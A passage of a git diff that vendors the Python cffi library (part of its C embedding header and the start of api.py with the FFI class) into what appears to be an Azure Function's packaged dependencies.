defined(__GNUC__) +# define CFFI_DLLEXPORT __attribute__((visibility("default"))) +#else +# define CFFI_DLLEXPORT /* nothing */ +#endif + + +/* There are two global variables of type _cffi_call_python_fnptr: + + * _cffi_call_python, which we declare just below, is the one called + by ``extern "Python"`` implementations. + + * _cffi_call_python_org, which on CPython is actually part of the + _cffi_exports[] array, is the function pointer copied from + _cffi_backend. If _cffi_start_python() fails, then this is set + to NULL; otherwise, it should never be NULL. + + After initialization is complete, both are equal. However, the + first one remains equal to &_cffi_start_and_call_python until the + very end of initialization, when we are (or should be) sure that + concurrent threads also see a completely initialized world, and + only then is it changed. +*/ +#undef _cffi_call_python +typedef void (*_cffi_call_python_fnptr)(struct _cffi_externpy_s *, char *); +static void _cffi_start_and_call_python(struct _cffi_externpy_s *, char *); +static _cffi_call_python_fnptr _cffi_call_python = &_cffi_start_and_call_python; + + +#ifndef _MSC_VER + /* --- Assuming a GCC not infinitely old --- */ +# define cffi_compare_and_swap(l,o,n) __sync_bool_compare_and_swap(l,o,n) +# define cffi_write_barrier() __sync_synchronize() +# if !defined(__amd64__) && !defined(__x86_64__) && \ + !defined(__i386__) && !defined(__i386) +# define cffi_read_barrier() __sync_synchronize() +# else +# define cffi_read_barrier() (void)0 +# endif +#else + /* --- Windows threads version --- */ +# include +# define cffi_compare_and_swap(l,o,n) \ + (InterlockedCompareExchangePointer(l,n,o) == (o)) +# define cffi_write_barrier() InterlockedCompareExchange(&_cffi_dummy,0,0) +# define cffi_read_barrier() (void)0 +static volatile LONG _cffi_dummy; +#endif + +#ifdef WITH_THREAD +# ifndef _MSC_VER +# include + static pthread_mutex_t _cffi_embed_startup_lock; +# else + static CRITICAL_SECTION _cffi_embed_startup_lock; +# endif + static char _cffi_embed_startup_lock_ready = 0; +#endif + +static void _cffi_acquire_reentrant_mutex(void) +{ + static void *volatile lock = NULL; + + while (!cffi_compare_and_swap(&lock, NULL, (void *)1)) { + /* should ideally do a spin loop instruction here, but + hard to do it portably and doesn't really matter I + think: pthread_mutex_init() should be very fast, and + this is only run at start-up anyway. */ + } + +#ifdef WITH_THREAD + if (!_cffi_embed_startup_lock_ready) { +# ifndef _MSC_VER + pthread_mutexattr_t attr; + pthread_mutexattr_init(&attr); + pthread_mutexattr_settype(&attr, PTHREAD_MUTEX_RECURSIVE); + pthread_mutex_init(&_cffi_embed_startup_lock, &attr); +# else + InitializeCriticalSection(&_cffi_embed_startup_lock); +# endif + _cffi_embed_startup_lock_ready = 1; + } +#endif + + while (!cffi_compare_and_swap(&lock, (void *)1, NULL)) + ; + +#ifndef _MSC_VER + pthread_mutex_lock(&_cffi_embed_startup_lock); +#else + EnterCriticalSection(&_cffi_embed_startup_lock); +#endif +} + +static void _cffi_release_reentrant_mutex(void) +{ +#ifndef _MSC_VER + pthread_mutex_unlock(&_cffi_embed_startup_lock); +#else + LeaveCriticalSection(&_cffi_embed_startup_lock); +#endif +} + + +/********** CPython-specific section **********/ +#ifndef PYPY_VERSION + +#include "_cffi_errors.h" + + +#define _cffi_call_python_org _cffi_exports[_CFFI_CPIDX] + +PyMODINIT_FUNC _CFFI_PYTHON_STARTUP_FUNC(void); /* forward */ + +static void _cffi_py_initialize(void) +{ + /* XXX use initsigs=0, which "skips initialization registration of + signal handlers, which might be useful when Python is + embedded" according to the Python docs. But review and think + if it should be a user-controllable setting. + + XXX we should also give a way to write errors to a buffer + instead of to stderr. + + XXX if importing 'site' fails, CPython (any version) calls + exit(). Should we try to work around this behavior here? + */ + Py_InitializeEx(0); +} + +static int _cffi_initialize_python(void) +{ + /* This initializes Python, imports _cffi_backend, and then the + present .dll/.so is set up as a CPython C extension module. + */ + int result; + PyGILState_STATE state; + PyObject *pycode=NULL, *global_dict=NULL, *x; + PyObject *builtins; + + state = PyGILState_Ensure(); + + /* Call the initxxx() function from the present module. It will + create and initialize us as a CPython extension module, instead + of letting the startup Python code do it---it might reimport + the same .dll/.so and get maybe confused on some platforms. + It might also have troubles locating the .dll/.so again for all + I know. + */ + (void)_CFFI_PYTHON_STARTUP_FUNC(); + if (PyErr_Occurred()) + goto error; + + /* Now run the Python code provided to ffi.embedding_init_code(). + */ + pycode = Py_CompileString(_CFFI_PYTHON_STARTUP_CODE, + "", + Py_file_input); + if (pycode == NULL) + goto error; + global_dict = PyDict_New(); + if (global_dict == NULL) + goto error; + builtins = PyEval_GetBuiltins(); + if (builtins == NULL) + goto error; + if (PyDict_SetItemString(global_dict, "__builtins__", builtins) < 0) + goto error; + x = PyEval_EvalCode( +#if PY_MAJOR_VERSION < 3 + (PyCodeObject *) +#endif + pycode, global_dict, global_dict); + if (x == NULL) + goto error; + Py_DECREF(x); + + /* Done! Now if we've been called from + _cffi_start_and_call_python() in an ``extern "Python"``, we can + only hope that the Python code did correctly set up the + corresponding @ffi.def_extern() function. Otherwise, the + general logic of ``extern "Python"`` functions (inside the + _cffi_backend module) will find that the reference is still + missing and print an error. + */ + result = 0; + done: + Py_XDECREF(pycode); + Py_XDECREF(global_dict); + PyGILState_Release(state); + return result; + + error:; + { + /* Print as much information as potentially useful. + Debugging load-time failures with embedding is not fun + */ + PyObject *ecap; + PyObject *exception, *v, *tb, *f, *modules, *mod; + PyErr_Fetch(&exception, &v, &tb); + ecap = _cffi_start_error_capture(); + f = PySys_GetObject((char *)"stderr"); + if (f != NULL && f != Py_None) { + PyFile_WriteString( + "Failed to initialize the Python-CFFI embedding logic:\n\n", f); + } + + if (exception != NULL) { + PyErr_NormalizeException(&exception, &v, &tb); + PyErr_Display(exception, v, tb); + } + Py_XDECREF(exception); + Py_XDECREF(v); + Py_XDECREF(tb); + + if (f != NULL && f != Py_None) { + PyFile_WriteString("\nFrom: " _CFFI_MODULE_NAME + "\ncompiled with cffi version: 1.15.1" + "\n_cffi_backend module: ", f); + modules = PyImport_GetModuleDict(); + mod = PyDict_GetItemString(modules, "_cffi_backend"); + if (mod == NULL) { + PyFile_WriteString("not loaded", f); + } + else { + v = PyObject_GetAttrString(mod, "__file__"); + PyFile_WriteObject(v, f, 0); + Py_XDECREF(v); + } + PyFile_WriteString("\nsys.path: ", f); + PyFile_WriteObject(PySys_GetObject((char *)"path"), f, 0); + PyFile_WriteString("\n\n", f); + } + _cffi_stop_error_capture(ecap); + } + result = -1; + goto done; +} + +#if PY_VERSION_HEX < 0x03080000 +PyAPI_DATA(char *) _PyParser_TokenNames[]; /* from CPython */ +#endif + +static int _cffi_carefully_make_gil(void) +{ + /* This does the basic initialization of Python. It can be called + completely concurrently from unrelated threads. It assumes + that we don't hold the GIL before (if it exists), and we don't + hold it afterwards. + + (What it really does used to be completely different in Python 2 + and Python 3, with the Python 2 solution avoiding the spin-lock + around the Py_InitializeEx() call. However, after recent changes + to CPython 2.7 (issue #358) it no longer works. So we use the + Python 3 solution everywhere.) + + This initializes Python by calling Py_InitializeEx(). + Important: this must not be called concurrently at all. + So we use a global variable as a simple spin lock. This global + variable must be from 'libpythonX.Y.so', not from this + cffi-based extension module, because it must be shared from + different cffi-based extension modules. + + In Python < 3.8, we choose + _PyParser_TokenNames[0] as a completely arbitrary pointer value + that is never written to. The default is to point to the + string "ENDMARKER". We change it temporarily to point to the + next character in that string. (Yes, I know it's REALLY + obscure.) + + In Python >= 3.8, this string array is no longer writable, so + instead we pick PyCapsuleType.tp_version_tag. We can't change + Python < 3.8 because someone might use a mixture of cffi + embedded modules, some of which were compiled before this file + changed. + */ + +#ifdef WITH_THREAD +# if PY_VERSION_HEX < 0x03080000 + char *volatile *lock = (char *volatile *)_PyParser_TokenNames; + char *old_value, *locked_value; + + while (1) { /* spin loop */ + old_value = *lock; + locked_value = old_value + 1; + if (old_value[0] == 'E') { + assert(old_value[1] == 'N'); + if (cffi_compare_and_swap(lock, old_value, locked_value)) + break; + } + else { + assert(old_value[0] == 'N'); + /* should ideally do a spin loop instruction here, but + hard to do it portably and doesn't really matter I + think: PyEval_InitThreads() should be very fast, and + this is only run at start-up anyway. */ + } + } +# else + int volatile *lock = (int volatile *)&PyCapsule_Type.tp_version_tag; + int old_value, locked_value; + assert(!(PyCapsule_Type.tp_flags & Py_TPFLAGS_HAVE_VERSION_TAG)); + + while (1) { /* spin loop */ + old_value = *lock; + locked_value = -42; + if (old_value == 0) { + if (cffi_compare_and_swap(lock, old_value, locked_value)) + break; + } + else { + assert(old_value == locked_value); + /* should ideally do a spin loop instruction here, but + hard to do it portably and doesn't really matter I + think: PyEval_InitThreads() should be very fast, and + this is only run at start-up anyway. */ + } + } +# endif +#endif + + /* call Py_InitializeEx() */ + if (!Py_IsInitialized()) { + _cffi_py_initialize(); +#if PY_VERSION_HEX < 0x03070000 + PyEval_InitThreads(); +#endif + PyEval_SaveThread(); /* release the GIL */ + /* the returned tstate must be the one that has been stored into the + autoTLSkey by _PyGILState_Init() called from Py_Initialize(). */ + } + else { +#if PY_VERSION_HEX < 0x03070000 + /* PyEval_InitThreads() is always a no-op from CPython 3.7 */ + PyGILState_STATE state = PyGILState_Ensure(); + PyEval_InitThreads(); + PyGILState_Release(state); +#endif + } + +#ifdef WITH_THREAD + /* release the lock */ + while (!cffi_compare_and_swap(lock, locked_value, old_value)) + ; +#endif + + return 0; +} + +/********** end CPython-specific section **********/ + + +#else + + +/********** PyPy-specific section **********/ + +PyMODINIT_FUNC _CFFI_PYTHON_STARTUP_FUNC(const void *[]); /* forward */ + +static struct _cffi_pypy_init_s { + const char *name; + void *func; /* function pointer */ + const char *code; +} _cffi_pypy_init = { + _CFFI_MODULE_NAME, + _CFFI_PYTHON_STARTUP_FUNC, + _CFFI_PYTHON_STARTUP_CODE, +}; + +extern int pypy_carefully_make_gil(const char *); +extern int pypy_init_embedded_cffi_module(int, struct _cffi_pypy_init_s *); + +static int _cffi_carefully_make_gil(void) +{ + return pypy_carefully_make_gil(_CFFI_MODULE_NAME); +} + +static int _cffi_initialize_python(void) +{ + return pypy_init_embedded_cffi_module(0xB011, &_cffi_pypy_init); +} + +/********** end PyPy-specific section **********/ + + +#endif + + +#ifdef __GNUC__ +__attribute__((noinline)) +#endif +static _cffi_call_python_fnptr _cffi_start_python(void) +{ + /* Delicate logic to initialize Python. This function can be + called multiple times concurrently, e.g. when the process calls + its first ``extern "Python"`` functions in multiple threads at + once. It can also be called recursively, in which case we must + ignore it. We also have to consider what occurs if several + different cffi-based extensions reach this code in parallel + threads---it is a different copy of the code, then, and we + can't have any shared global variable unless it comes from + 'libpythonX.Y.so'. + + Idea: + + * _cffi_carefully_make_gil(): "carefully" call + PyEval_InitThreads() (possibly with Py_InitializeEx() first). + + * then we use a (local) custom lock to make sure that a call to this + cffi-based extension will wait if another call to the *same* + extension is running the initialization in another thread. + It is reentrant, so that a recursive call will not block, but + only one from a different thread. + + * then we grab the GIL and (Python 2) we call Py_InitializeEx(). + At this point, concurrent calls to Py_InitializeEx() are not + possible: we have the GIL. + + * do the rest of the specific initialization, which may + temporarily release the GIL but not the custom lock. + Only release the custom lock when we are done. + */ + static char called = 0; + + if (_cffi_carefully_make_gil() != 0) + return NULL; + + _cffi_acquire_reentrant_mutex(); + + /* Here the GIL exists, but we don't have it. We're only protected + from concurrency by the reentrant mutex. */ + + /* This file only initializes the embedded module once, the first + time this is called, even if there are subinterpreters. */ + if (!called) { + called = 1; /* invoke _cffi_initialize_python() only once, + but don't set '_cffi_call_python' right now, + otherwise concurrent threads won't call + this function at all (we need them to wait) */ + if (_cffi_initialize_python() == 0) { + /* now initialization is finished. Switch to the fast-path. */ + + /* We would like nobody to see the new value of + '_cffi_call_python' without also seeing the rest of the + data initialized. However, this is not possible. But + the new value of '_cffi_call_python' is the function + 'cffi_call_python()' from _cffi_backend. So: */ + cffi_write_barrier(); + /* ^^^ we put a write barrier here, and a corresponding + read barrier at the start of cffi_call_python(). This + ensures that after that read barrier, we see everything + done here before the write barrier. + */ + + assert(_cffi_call_python_org != NULL); + _cffi_call_python = (_cffi_call_python_fnptr)_cffi_call_python_org; + } + else { + /* initialization failed. Reset this to NULL, even if it was + already set to some other value. Future calls to + _cffi_start_python() are still forced to occur, and will + always return NULL from now on. */ + _cffi_call_python_org = NULL; + } + } + + _cffi_release_reentrant_mutex(); + + return (_cffi_call_python_fnptr)_cffi_call_python_org; +} + +static +void _cffi_start_and_call_python(struct _cffi_externpy_s *externpy, char *args) +{ + _cffi_call_python_fnptr fnptr; + int current_err = errno; +#ifdef _MSC_VER + int current_lasterr = GetLastError(); +#endif + fnptr = _cffi_start_python(); + if (fnptr == NULL) { + fprintf(stderr, "function %s() called, but initialization code " + "failed. Returning 0.\n", externpy->name); + memset(args, 0, externpy->size_of_result); + } +#ifdef _MSC_VER + SetLastError(current_lasterr); +#endif + errno = current_err; + + if (fnptr != NULL) + fnptr(externpy, args); +} + + +/* The cffi_start_python() function makes sure Python is initialized + and our cffi module is set up. It can be called manually from the + user C code. The same effect is obtained automatically from any + dll-exported ``extern "Python"`` function. This function returns + -1 if initialization failed, 0 if all is OK. */ +_CFFI_UNUSED_FN +static int cffi_start_python(void) +{ + if (_cffi_call_python == &_cffi_start_and_call_python) { + if (_cffi_start_python() == NULL) + return -1; + } + cffi_read_barrier(); + return 0; +} + +#undef cffi_compare_and_swap +#undef cffi_write_barrier +#undef cffi_read_barrier + +#ifdef __cplusplus +} +#endif diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/api.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/api.py new file mode 100644 index 0000000..10090fe --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/api.py @@ -0,0 +1,965 @@ +import sys, types +from .lock import allocate_lock +from .error import CDefError +from . import model + +try: + callable +except NameError: + # Python 3.1 + from collections import Callable + callable = lambda x: isinstance(x, Callable) + +try: + basestring +except NameError: + # Python 3.x + basestring = str + +_unspecified = object() + + + +class FFI(object): + r''' + The main top-level class that you instantiate once, or once per module. + + Example usage: + + ffi = FFI() + ffi.cdef(""" + int printf(const char *, ...); + """) + + C = ffi.dlopen(None) # standard library + -or- + C = ffi.verify() # use a C compiler: verify the decl above is right + + C.printf("hello, %s!\n", ffi.new("char[]", "world")) + ''' + + def __init__(self, backend=None): + """Create an FFI instance. The 'backend' argument is used to + select a non-default backend, mostly for tests. + """ + if backend is None: + # You need PyPy (>= 2.0 beta), or a CPython (>= 2.6) with + # _cffi_backend.so compiled. + import _cffi_backend as backend + from . import __version__ + if backend.__version__ != __version__: + # bad version! Try to be as explicit as possible. + if hasattr(backend, '__file__'): + # CPython + raise Exception("Version mismatch: this is the 'cffi' package version %s, located in %r. When we import the top-level '_cffi_backend' extension module, we get version %s, located in %r. The two versions should be equal; check your installation." % ( + __version__, __file__, + backend.__version__, backend.__file__)) + else: + # PyPy + raise Exception("Version mismatch: this is the 'cffi' package version %s, located in %r. This interpreter comes with a built-in '_cffi_backend' module, which is version %s. The two versions should be equal; check your installation." % ( + __version__, __file__, backend.__version__)) + # (If you insist you can also try to pass the option + # 'backend=backend_ctypes.CTypesBackend()', but don't + # rely on it! It's probably not going to work well.) + + from . import cparser + self._backend = backend + self._lock = allocate_lock() + self._parser = cparser.Parser() + self._cached_btypes = {} + self._parsed_types = types.ModuleType('parsed_types').__dict__ + self._new_types = types.ModuleType('new_types').__dict__ + self._function_caches = [] + self._libraries = [] + self._cdefsources = [] + self._included_ffis = [] + self._windows_unicode = None + self._init_once_cache = {} + self._cdef_version = None + self._embedding = None + self._typecache = model.get_typecache(backend) + if hasattr(backend, 'set_ffi'): + backend.set_ffi(self) + for name in list(backend.__dict__): + if name.startswith('RTLD_'): + setattr(self, name, getattr(backend, name)) + # + with self._lock: + self.BVoidP = self._get_cached_btype(model.voidp_type) + self.BCharA = self._get_cached_btype(model.char_array_type) + if isinstance(backend, types.ModuleType): + # _cffi_backend: attach these constants to the class + if not hasattr(FFI, 'NULL'): + FFI.NULL = self.cast(self.BVoidP, 0) + FFI.CData, FFI.CType = backend._get_types() + else: + # ctypes backend: attach these constants to the instance + self.NULL = self.cast(self.BVoidP, 0) + self.CData, self.CType = backend._get_types() + self.buffer = backend.buffer + + def cdef(self, csource, override=False, packed=False, pack=None): + """Parse the given C source. This registers all declared functions, + types, and global variables. The functions and global variables can + then be accessed via either 'ffi.dlopen()' or 'ffi.verify()'. + The types can be used in 'ffi.new()' and other functions. + If 'packed' is specified as True, all structs declared inside this + cdef are packed, i.e. laid out without any field alignment at all. + Alternatively, 'pack' can be a small integer, and requests for + alignment greater than that are ignored (pack=1 is equivalent to + packed=True). + """ + self._cdef(csource, override=override, packed=packed, pack=pack) + + def embedding_api(self, csource, packed=False, pack=None): + self._cdef(csource, packed=packed, pack=pack, dllexport=True) + if self._embedding is None: + self._embedding = '' + + def _cdef(self, csource, override=False, **options): + if not isinstance(csource, str): # unicode, on Python 2 + if not isinstance(csource, basestring): + raise TypeError("cdef() argument must be a string") + csource = csource.encode('ascii') + with self._lock: + self._cdef_version = object() + self._parser.parse(csource, override=override, **options) + self._cdefsources.append(csource) + if override: + for cache in self._function_caches: + cache.clear() + finishlist = self._parser._recomplete + if finishlist: + self._parser._recomplete = [] + for tp in finishlist: + tp.finish_backend_type(self, finishlist) + + def dlopen(self, name, flags=0): + """Load and return a dynamic library identified by 'name'. + The standard C library can be loaded by passing None. + Note that functions and types declared by 'ffi.cdef()' are not + linked to a particular library, just like C headers; in the + library we only look for the actual (untyped) symbols. + """ + if not (isinstance(name, basestring) or + name is None or + isinstance(name, self.CData)): + raise TypeError("dlopen(name): name must be a file name, None, " + "or an already-opened 'void *' handle") + with self._lock: + lib, function_cache = _make_ffi_library(self, name, flags) + self._function_caches.append(function_cache) + self._libraries.append(lib) + return lib + + def dlclose(self, lib): + """Close a library obtained with ffi.dlopen(). After this call, + access to functions or variables from the library will fail + (possibly with a segmentation fault). + """ + type(lib).__cffi_close__(lib) + + def _typeof_locked(self, cdecl): + # call me with the lock! + key = cdecl + if key in self._parsed_types: + return self._parsed_types[key] + # + if not isinstance(cdecl, str): # unicode, on Python 2 + cdecl = cdecl.encode('ascii') + # + type = self._parser.parse_type(cdecl) + really_a_function_type = type.is_raw_function + if really_a_function_type: + type = type.as_function_pointer() + btype = self._get_cached_btype(type) + result = btype, really_a_function_type + self._parsed_types[key] = result + return result + + def _typeof(self, cdecl, consider_function_as_funcptr=False): + # string -> ctype object + try: + result = self._parsed_types[cdecl] + except KeyError: + with self._lock: + result = self._typeof_locked(cdecl) + # + btype, really_a_function_type = result + if really_a_function_type and not consider_function_as_funcptr: + raise CDefError("the type %r is a function type, not a " + "pointer-to-function type" % (cdecl,)) + return btype + + def typeof(self, cdecl): + """Parse the C type given as a string and return the + corresponding object. + It can also be used on 'cdata' instance to get its C type. + """ + if isinstance(cdecl, basestring): + return self._typeof(cdecl) + if isinstance(cdecl, self.CData): + return self._backend.typeof(cdecl) + if isinstance(cdecl, types.BuiltinFunctionType): + res = _builtin_function_type(cdecl) + if res is not None: + return res + if (isinstance(cdecl, types.FunctionType) + and hasattr(cdecl, '_cffi_base_type')): + with self._lock: + return self._get_cached_btype(cdecl._cffi_base_type) + raise TypeError(type(cdecl)) + + def sizeof(self, cdecl): + """Return the size in bytes of the argument. It can be a + string naming a C type, or a 'cdata' instance. + """ + if isinstance(cdecl, basestring): + BType = self._typeof(cdecl) + return self._backend.sizeof(BType) + else: + return self._backend.sizeof(cdecl) + + def alignof(self, cdecl): + """Return the natural alignment size in bytes of the C type + given as a string. + """ + if isinstance(cdecl, basestring): + cdecl = self._typeof(cdecl) + return self._backend.alignof(cdecl) + + def offsetof(self, cdecl, *fields_or_indexes): + """Return the offset of the named field inside the given + structure or array, which must be given as a C type name. + You can give several field names in case of nested structures. + You can also give numeric values which correspond to array + items, in case of an array type. + """ + if isinstance(cdecl, basestring): + cdecl = self._typeof(cdecl) + return self._typeoffsetof(cdecl, *fields_or_indexes)[1] + + def new(self, cdecl, init=None): + """Allocate an instance according to the specified C type and + return a pointer to it. The specified C type must be either a + pointer or an array: ``new('X *')`` allocates an X and returns + a pointer to it, whereas ``new('X[n]')`` allocates an array of + n X'es and returns an array referencing it (which works + mostly like a pointer, like in C). You can also use + ``new('X[]', n)`` to allocate an array of a non-constant + length n. + + The memory is initialized following the rules of declaring a + global variable in C: by default it is zero-initialized, but + an explicit initializer can be given which can be used to + fill all or part of the memory. + + When the returned object goes out of scope, the memory + is freed. In other words the returned object has + ownership of the value of type 'cdecl' that it points to. This + means that the raw data can be used as long as this object is + kept alive, but must not be used for a longer time. Be careful + about that when copying the pointer to the memory somewhere + else, e.g. into another structure. + """ + if isinstance(cdecl, basestring): + cdecl = self._typeof(cdecl) + return self._backend.newp(cdecl, init) + + def new_allocator(self, alloc=None, free=None, + should_clear_after_alloc=True): + """Return a new allocator, i.e. a function that behaves like ffi.new() + but uses the provided low-level 'alloc' and 'free' functions. + + 'alloc' is called with the size as argument. If it returns NULL, a + MemoryError is raised. 'free' is called with the result of 'alloc' + as argument. Both can be either Python function or directly C + functions. If 'free' is None, then no free function is called. + If both 'alloc' and 'free' are None, the default is used. + + If 'should_clear_after_alloc' is set to False, then the memory + returned by 'alloc' is assumed to be already cleared (or you are + fine with garbage); otherwise CFFI will clear it. + """ + compiled_ffi = self._backend.FFI() + allocator = compiled_ffi.new_allocator(alloc, free, + should_clear_after_alloc) + def allocate(cdecl, init=None): + if isinstance(cdecl, basestring): + cdecl = self._typeof(cdecl) + return allocator(cdecl, init) + return allocate + + def cast(self, cdecl, source): + """Similar to a C cast: returns an instance of the named C + type initialized with the given 'source'. The source is + casted between integers or pointers of any type. + """ + if isinstance(cdecl, basestring): + cdecl = self._typeof(cdecl) + return self._backend.cast(cdecl, source) + + def string(self, cdata, maxlen=-1): + """Return a Python string (or unicode string) from the 'cdata'. + If 'cdata' is a pointer or array of characters or bytes, returns + the null-terminated string. The returned string extends until + the first null character, or at most 'maxlen' characters. If + 'cdata' is an array then 'maxlen' defaults to its length. + + If 'cdata' is a pointer or array of wchar_t, returns a unicode + string following the same rules. + + If 'cdata' is a single character or byte or a wchar_t, returns + it as a string or unicode string. + + If 'cdata' is an enum, returns the value of the enumerator as a + string, or 'NUMBER' if the value is out of range. + """ + return self._backend.string(cdata, maxlen) + + def unpack(self, cdata, length): + """Unpack an array of C data of the given length, + returning a Python string/unicode/list. + + If 'cdata' is a pointer to 'char', returns a byte string. + It does not stop at the first null. This is equivalent to: + ffi.buffer(cdata, length)[:] + + If 'cdata' is a pointer to 'wchar_t', returns a unicode string. + 'length' is measured in wchar_t's; it is not the size in bytes. + + If 'cdata' is a pointer to anything else, returns a list of + 'length' items. This is a faster equivalent to: + [cdata[i] for i in range(length)] + """ + return self._backend.unpack(cdata, length) + + #def buffer(self, cdata, size=-1): + # """Return a read-write buffer object that references the raw C data + # pointed to by the given 'cdata'. The 'cdata' must be a pointer or + # an array. Can be passed to functions expecting a buffer, or directly + # manipulated with: + # + # buf[:] get a copy of it in a regular string, or + # buf[idx] as a single character + # buf[:] = ... + # buf[idx] = ... change the content + # """ + # note that 'buffer' is a type, set on this instance by __init__ + + def from_buffer(self, cdecl, python_buffer=_unspecified, + require_writable=False): + """Return a cdata of the given type pointing to the data of the + given Python object, which must support the buffer interface. + Note that this is not meant to be used on the built-in types + str or unicode (you can build 'char[]' arrays explicitly) + but only on objects containing large quantities of raw data + in some other format, like 'array.array' or numpy arrays. + + The first argument is optional and default to 'char[]'. + """ + if python_buffer is _unspecified: + cdecl, python_buffer = self.BCharA, cdecl + elif isinstance(cdecl, basestring): + cdecl = self._typeof(cdecl) + return self._backend.from_buffer(cdecl, python_buffer, + require_writable) + + def memmove(self, dest, src, n): + """ffi.memmove(dest, src, n) copies n bytes of memory from src to dest. + + Like the C function memmove(), the memory areas may overlap; + apart from that it behaves like the C function memcpy(). + + 'src' can be any cdata ptr or array, or any Python buffer object. + 'dest' can be any cdata ptr or array, or a writable Python buffer + object. The size to copy, 'n', is always measured in bytes. + + Unlike other methods, this one supports all Python buffer including + byte strings and bytearrays---but it still does not support + non-contiguous buffers. + """ + return self._backend.memmove(dest, src, n) + + def callback(self, cdecl, python_callable=None, error=None, onerror=None): + """Return a callback object or a decorator making such a + callback object. 'cdecl' must name a C function pointer type. + The callback invokes the specified 'python_callable' (which may + be provided either directly or via a decorator). Important: the + callback object must be manually kept alive for as long as the + callback may be invoked from the C level. + """ + def callback_decorator_wrap(python_callable): + if not callable(python_callable): + raise TypeError("the 'python_callable' argument " + "is not callable") + return self._backend.callback(cdecl, python_callable, + error, onerror) + if isinstance(cdecl, basestring): + cdecl = self._typeof(cdecl, consider_function_as_funcptr=True) + if python_callable is None: + return callback_decorator_wrap # decorator mode + else: + return callback_decorator_wrap(python_callable) # direct mode + + def getctype(self, cdecl, replace_with=''): + """Return a string giving the C type 'cdecl', which may be itself + a string or a object. If 'replace_with' is given, it gives + extra text to append (or insert for more complicated C types), like + a variable name, or '*' to get actually the C type 'pointer-to-cdecl'. + """ + if isinstance(cdecl, basestring): + cdecl = self._typeof(cdecl) + replace_with = replace_with.strip() + if (replace_with.startswith('*') + and '&[' in self._backend.getcname(cdecl, '&')): + replace_with = '(%s)' % replace_with + elif replace_with and not replace_with[0] in '[(': + replace_with = ' ' + replace_with + return self._backend.getcname(cdecl, replace_with) + + def gc(self, cdata, destructor, size=0): + """Return a new cdata object that points to the same + data. Later, when this new cdata object is garbage-collected, + 'destructor(old_cdata_object)' will be called. + + The optional 'size' gives an estimate of the size, used to + trigger the garbage collection more eagerly. So far only used + on PyPy. It tells the GC that the returned object keeps alive + roughly 'size' bytes of external memory. + """ + return self._backend.gcp(cdata, destructor, size) + + def _get_cached_btype(self, type): + assert self._lock.acquire(False) is False + # call me with the lock! + try: + BType = self._cached_btypes[type] + except KeyError: + finishlist = [] + BType = type.get_cached_btype(self, finishlist) + for type in finishlist: + type.finish_backend_type(self, finishlist) + return BType + + def verify(self, source='', tmpdir=None, **kwargs): + """Verify that the current ffi signatures compile on this + machine, and return a dynamic library object. The dynamic + library can be used to call functions and access global + variables declared in this 'ffi'. The library is compiled + by the C compiler: it gives you C-level API compatibility + (including calling macros). This is unlike 'ffi.dlopen()', + which requires binary compatibility in the signatures. + """ + from .verifier import Verifier, _caller_dir_pycache + # + # If set_unicode(True) was called, insert the UNICODE and + # _UNICODE macro declarations + if self._windows_unicode: + self._apply_windows_unicode(kwargs) + # + # Set the tmpdir here, and not in Verifier.__init__: it picks + # up the caller's directory, which we want to be the caller of + # ffi.verify(), as opposed to the caller of Veritier(). + tmpdir = tmpdir or _caller_dir_pycache() + # + # Make a Verifier() and use it to load the library. + self.verifier = Verifier(self, source, tmpdir, **kwargs) + lib = self.verifier.load_library() + # + # Save the loaded library for keep-alive purposes, even + # if the caller doesn't keep it alive itself (it should). + self._libraries.append(lib) + return lib + + def _get_errno(self): + return self._backend.get_errno() + def _set_errno(self, errno): + self._backend.set_errno(errno) + errno = property(_get_errno, _set_errno, None, + "the value of 'errno' from/to the C calls") + + def getwinerror(self, code=-1): + return self._backend.getwinerror(code) + + def _pointer_to(self, ctype): + with self._lock: + return model.pointer_cache(self, ctype) + + def addressof(self, cdata, *fields_or_indexes): + """Return the address of a . + If 'fields_or_indexes' are given, returns the address of that + field or array item in the structure or array, recursively in + case of nested structures. + """ + try: + ctype = self._backend.typeof(cdata) + except TypeError: + if '__addressof__' in type(cdata).__dict__: + return type(cdata).__addressof__(cdata, *fields_or_indexes) + raise + if fields_or_indexes: + ctype, offset = self._typeoffsetof(ctype, *fields_or_indexes) + else: + if ctype.kind == "pointer": + raise TypeError("addressof(pointer)") + offset = 0 + ctypeptr = self._pointer_to(ctype) + return self._backend.rawaddressof(ctypeptr, cdata, offset) + + def _typeoffsetof(self, ctype, field_or_index, *fields_or_indexes): + ctype, offset = self._backend.typeoffsetof(ctype, field_or_index) + for field1 in fields_or_indexes: + ctype, offset1 = self._backend.typeoffsetof(ctype, field1, 1) + offset += offset1 + return ctype, offset + + def include(self, ffi_to_include): + """Includes the typedefs, structs, unions and enums defined + in another FFI instance. Usage is similar to a #include in C, + where a part of the program might include types defined in + another part for its own usage. Note that the include() + method has no effect on functions, constants and global + variables, which must anyway be accessed directly from the + lib object returned by the original FFI instance. + """ + if not isinstance(ffi_to_include, FFI): + raise TypeError("ffi.include() expects an argument that is also of" + " type cffi.FFI, not %r" % ( + type(ffi_to_include).__name__,)) + if ffi_to_include is self: + raise ValueError("self.include(self)") + with ffi_to_include._lock: + with self._lock: + self._parser.include(ffi_to_include._parser) + self._cdefsources.append('[') + self._cdefsources.extend(ffi_to_include._cdefsources) + self._cdefsources.append(']') + self._included_ffis.append(ffi_to_include) + + def new_handle(self, x): + return self._backend.newp_handle(self.BVoidP, x) + + def from_handle(self, x): + return self._backend.from_handle(x) + + def release(self, x): + self._backend.release(x) + + def set_unicode(self, enabled_flag): + """Windows: if 'enabled_flag' is True, enable the UNICODE and + _UNICODE defines in C, and declare the types like TCHAR and LPTCSTR + to be (pointers to) wchar_t. If 'enabled_flag' is False, + declare these types to be (pointers to) plain 8-bit characters. + This is mostly for backward compatibility; you usually want True. + """ + if self._windows_unicode is not None: + raise ValueError("set_unicode() can only be called once") + enabled_flag = bool(enabled_flag) + if enabled_flag: + self.cdef("typedef wchar_t TBYTE;" + "typedef wchar_t TCHAR;" + "typedef const wchar_t *LPCTSTR;" + "typedef const wchar_t *PCTSTR;" + "typedef wchar_t *LPTSTR;" + "typedef wchar_t *PTSTR;" + "typedef TBYTE *PTBYTE;" + "typedef TCHAR *PTCHAR;") + else: + self.cdef("typedef char TBYTE;" + "typedef char TCHAR;" + "typedef const char *LPCTSTR;" + "typedef const char *PCTSTR;" + "typedef char *LPTSTR;" + "typedef char *PTSTR;" + "typedef TBYTE 